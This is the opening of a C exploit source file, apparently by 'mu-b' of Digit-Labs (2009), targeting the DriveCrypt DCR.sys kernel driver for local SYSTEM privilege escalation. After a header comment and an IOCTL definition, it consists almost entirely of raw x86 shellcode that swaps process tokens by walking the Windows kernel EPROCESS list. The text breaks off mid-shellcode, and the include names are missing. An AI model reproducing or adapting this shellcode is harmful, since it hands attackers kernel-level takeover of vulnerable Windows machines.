/* drivecrypt-dcr.c * |
* Copyright (c) 2009 by |
* |
* DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit |
* by mu-b - Sun 16 Aug 2009 |
* |
* - Tested on: DCR.sys |
* |
* Compile: MinGW + -lntdll |
* |
* - Private Source Code -DO NOT DISTRIBUTE - |
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$! |
*/ |
#include |
#include |
#include |
#include |
#define DCR_IOCTL 0x00073800 |
static unsigned char win32_fixup[] = |
"\x89\xe5" |
"\x81\xc5\xb4\x0c\x00\x00"; |
/* Win2k3 SP1/2 - kernel EPROCESS token switcher |
* by mu-b |
*/ |
static unsigned char win2k3_ring0_shell[] = |
/* _ring0 */ |
"\xb8\x24\xf1\xdf\xff" |
"\x8b\x00" |
"\x8b\xb0\x18\x02\x00\x00" |
"\x89\xf0" |
/* _sys_eprocess_loop */ |
"\x8b\x98\x94\x00\x00\x00" |
"\x81\xfb\x04\x00\x00\x00" |
"\x74\x11" |
"\x8b\x80\x9c\x00\x00\x00" |
"\x2d\x98\x00\x00\x00" |
"\x39\xf0" |
"\x75\xe3" |
"\xeb\x21" |
/* _sys_eprocess_found */ |
"\x89\xc1" |
"\x89\xf0" |
/* _cmd_eprocess_loop */ |
"\x8b\x98\x94\x00\x00\x00" |
"\x81\xfb\x00\x00\x00\x00" |
"\x74\x10" |
"\x8b\x80\x9c\x00\x00\x00" |
"\x2d\x98\x00\x00\x00" |
"\x39\xf0" |
"\x75\xe3" |
/* _not_found */ |
"\xcc" |
/* _cmd_eprocess_found |
* _ring0_end */ |